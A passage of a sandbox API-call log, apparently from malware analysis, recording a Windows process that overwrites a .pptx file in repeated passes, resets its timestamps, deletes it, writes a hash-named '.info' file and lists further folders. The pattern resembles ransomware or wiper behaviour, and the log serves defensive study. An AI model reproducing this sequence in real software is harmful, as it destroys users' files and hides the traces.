(in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0xdc0, lpOverlapped=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x36c, lpBuffer=0x21a0550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a0550*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.994] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50.info", lpFilePart=0x0) returned 0x4d [0075.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.994] WriteFile (in: hFile=0x36c, lpBuffer=0x21acc20*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21acc20*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.995] CloseHandle (hObject=0x36c) returned 1 [0075.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.996] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fef6d0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0x2d803120, ftLastAccessTime.dwHighDateTime=0x1d4cf56, ftLastWriteTime.dwLowDateTime=0x2d803120, ftLastWriteTime.dwHighDateTime=0x1d4cf56, nFileSizeHigh=0x0, nFileSizeLow=0xfdb8)) returned 1 [0075.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.996] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", dwFileAttributes=0x80) returned 1 [0075.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), fInfoLevelId=0x0, lpFileInformation=0x21b4818 | out: lpFileInformation=0x21b4818*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x70fef6d0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0x2d803120, ftLastAccessTime.dwHighDateTime=0x1d4cf56, ftLastWriteTime.dwLowDateTime=0x2d803120, ftLastWriteTime.dwHighDateTime=0x1d4cf56, nFileSizeHigh=0x0, nFileSizeLow=0xfdb8)) returned 1 [0075.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0075.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.997] GetFileType (hFile=0x36c) returned 0x1 [0075.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.997] GetFileType (hFile=0x36c) returned 0x1 [0075.997] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.998] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.999] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.999] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.000] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.001] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.002] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.002] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.008] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.009] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.010] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.010] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.011] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.012] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.013] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.013] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.014] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5daa8*=0xe00, lpOverlapped=0x0) returned 1 [0076.014] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0076.015] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.016] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.016] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.017] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.018] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.019] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.019] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.020] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.021] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.021] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.022] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.023] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.024] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.024] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.025] WriteFile (in: hFile=0x36c, lpBuffer=0x21b4cc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b4cc0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0076.026] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0076.026] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0076.027] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0076.027] SetEndOfFile (hFile=0x36c) returned 1 [0076.028] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0076.028] CloseHandle (hObject=0x36c) returned 1 [0076.028] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0076.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0076.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.028] GetFileType (hFile=0x36c) returned 0x1 [0076.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0076.028] GetFileType (hFile=0x36c) returned 0x1 [0076.028] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.029] CloseHandle (hObject=0x36c) returned 1 [0076.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0076.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0076.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.029] GetFileType (hFile=0x36c) returned 0x1 [0076.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0076.029] GetFileType (hFile=0x36c) returned 0x1 [0076.029] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0076.029] CloseHandle (hObject=0x36c) returned 1 [0076.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0076.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0076.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.029] GetFileType (hFile=0x36c) returned 0x1 [0076.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0076.029] GetFileType (hFile=0x36c) returned 0x1 [0076.029] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0076.030] CloseHandle (hObject=0x36c) returned 1 [0076.030] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0076.030] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wdgdbpnhl6horo.pptx")) returned 1 [0076.030] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wdgDbpNHL6HoRO.pptx", lpFilePart=0x0) returned 0x3b [0076.031] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", lpFilePart=0x0) returned 0x48 [0076.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0076.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.031] GetFileType (hFile=0x36c) returned 0x1 [0076.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0076.031] GetFileType (hFile=0x36c) returned 0x1 [0076.031] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.031] CloseHandle (hObject=0x36c) returned 1 [0076.031] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", lpFilePart=0x0) returned 0x48 [0076.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0076.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.031] GetFileType (hFile=0x36c) returned 0x1 [0076.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0076.031] GetFileType (hFile=0x36c) returned 0x1 [0076.031] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0076.031] CloseHandle (hObject=0x36c) returned 1 [0076.032] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50", lpFilePart=0x0) returned 0x48 [0076.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0076.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E459352E54568E51187DDC904D9BBE50" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e459352e54568e51187ddc904d9bbe50"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.032] GetFileType (hFile=0x36c) returned 0x1 [0076.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0076.032] GetFileType (hFile=0x36c) returned 0x1 [0076.032] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0076.032] CloseHandle (hObject=0x36c) returned 1 [0076.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0076.033] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U", lpFilePart=0x0) returned 0x30 [0076.033] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\", lpFilePart=0x0) returned 0x31 [0076.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 